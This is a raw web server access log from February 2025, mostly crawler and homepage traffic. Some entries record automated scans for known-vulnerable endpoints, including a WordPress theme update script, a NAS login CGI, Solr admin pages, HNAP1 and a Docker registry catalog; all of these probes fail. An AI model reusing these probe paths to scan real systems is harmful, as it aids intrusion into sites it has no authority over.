193.68.89.51 - - [18/Feb/2025:21:15:33 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [18/Feb/2025:21:17:21 +0100] "GET /default/cgi-bin/lang/awstats-br.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:21:21:21 +0100] "GET /default/cgi-bin/lang/awstats-ba.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:21:26:19 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951701.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [18/Feb/2025:21:31:58 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [18/Feb/2025:21:40:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005270903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:21:44:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001151803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:21:48:05 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image016.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.121.84.7 - - [18/Feb/2025:21:50:40 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [18/Feb/2025:22:17:21 +0100] "GET /default/cgi-bin/lang/awstats-nl.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Feb/2025:22:40:13 +0100] "GET /default/cgi-bin/lang/awstats-ko.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
180.163.220.124 - - [18/Feb/2025:22:41:24 +0100] "\x16\x03\x01\x018\x01" 400 383 "-" "-"
180.163.220.112 - - [18/Feb/2025:22:41:26 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
180.163.220.42 - - [18/Feb/2025:22:41:35 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
180.163.220.124 - - [18/Feb/2025:22:41:38 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
180.163.220.60 - - [18/Feb/2025:22:41:41 +0100] "GET /sitemap.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
180.163.220.60 - - [18/Feb/2025:22:41:43 +0100] "GET /config.json HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
156.59.198.136 - - [18/Feb/2025:23:03:24 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911261503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Feb/2025:23:07:24 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10969001.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Feb/2025:23:17:10 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11359000.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [18/Feb/2025:23:20:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [18/Feb/2025:23:21:10 +0100] "GET /default/cgi-bin/lang/awstats-nn.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.38.23.16 - - [18/Feb/2025:23:22:51 +0100] "GET /wp-content/themes/photocrati-theme-v4.07/admin/scripts/scripts-update.php HTTP/1.1" 404 425 "-" "ALittle Client"
194.38.23.16 - - [18/Feb/2025:23:23:16 +0100] "GET /wp-content/themes/photocrati-theme-v4.07/admin/scripts/scripts-update.php HTTP/1.1" 404 438 "-" "ALittle Client"
18.117.235.241 - - [18/Feb/2025:23:37:26 +0100] "\x16\x03\x01" 400 383 "-" "-"
18.117.235.241 - - [18/Feb/2025:23:37:27 +0100] "SSH-2.0-Go" 400 383 "-" "-"
18.117.235.241 - - [18/Feb/2025:23:37:28 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
18.117.235.241 - - [18/Feb/2025:23:37:28 +0100] "\x16\x03\x01" 400 383 "-" "-"
18.117.235.241 - - [18/Feb/2025:23:37:39 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [18/Feb/2025:23:54:43 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951706.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
164.92.140.171 - - [19/Feb/2025:00:07:01 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
164.92.140.171 - - [19/Feb/2025:00:07:01 +0100] "GET /odinhttpcall1739914549 HTTP/1.1" 404 367 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.140.171 - - [19/Feb/2025:00:07:01 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
164.92.140.171 - - [19/Feb/2025:00:07:01 +0100] "POST /sdk HTTP/1.1" 404 348 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.140.171 - - [19/Feb/2025:00:07:01 +0100] "GET /evox/about HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.140.171 - - [19/Feb/2025:00:07:01 +0100] "GET /HNAP1 HTTP/1.1" 404 350 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.140.171 - - [19/Feb/2025:00:07:01 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
164.92.140.171 - - [19/Feb/2025:00:07:01 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
209.38.201.6 - - [19/Feb/2025:00:07:01 +0100] "\x16\x03\x01" 400 383 "-" "-"
164.90.166.9 - - [19/Feb/2025:00:07:01 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 366 "-" "Go-http-client/1.1"
138.68.111.165 - - [19/Feb/2025:00:07:01 +0100] "GET /solr/admin/info/system HTTP/1.1" 404 367 "-" "Go-http-client/1.1"
164.92.245.26 - - [19/Feb/2025:00:07:01 +0100] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 350 "-" "Go-http-client/1.1"
64.226.100.4 - - [19/Feb/2025:00:07:01 +0100] "GET /v2/_catalog HTTP/1.1" 404 356 "-" "Go-http-client/1.1"
209.38.242.244 - - [19/Feb/2025:00:07:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
209.38.201.6 - - [19/Feb/2025:00:07:01 +0100] "\x16\x03\x01" 400 383 "-" "-"
138.68.111.165 - - [19/Feb/2025:00:07:01 +0100] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 361 "-" "Go-http-client/1.1"
174.138.27.103 - - [19/Feb/2025:00:07:02 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
216.244.66.235 - - [19/Feb/2025:00:08:07 +0100] "GET /robots.txt HTTP/1.1" 404 375 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
80.82.77.202 - - [19/Feb/2025:00:09:15 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
156.59.198.136 - - [19/Feb/2025:00:12:11 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.180.140.103 - - [19/Feb/2025:00:14:09 +0100] "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
216.244.66.235 - - [19/Feb/2025:00:16:49 +0100] "GET /?feed=rss2&p=1 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
59.178.210.92 - - [19/Feb/2025:00:24:00 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
59.178.210.92 - - [19/Feb/2025:00:24:00 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
209.38.201.6 - - [19/Feb/2025:00:27:17 +0100] "\x16\x03\x01\x01$\x01" 400 383 "-" "-"
156.59.198.136 - - [19/Feb/2025:00:40:09 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111231103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.121.84.7 - - [19/Feb/2025:00:42:21 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
93.174.93.12 - - [19/Feb/2025:00:43:10 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.135 - - [19/Feb/2025:00:47:54 +0100] "GET /default/cgi-bin/lang/awstats-sk.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Feb/2025:00:51:54 +0100] "GET /default/cgi-bin/lang/awstats-th.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [19/Feb/2025:00:56:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"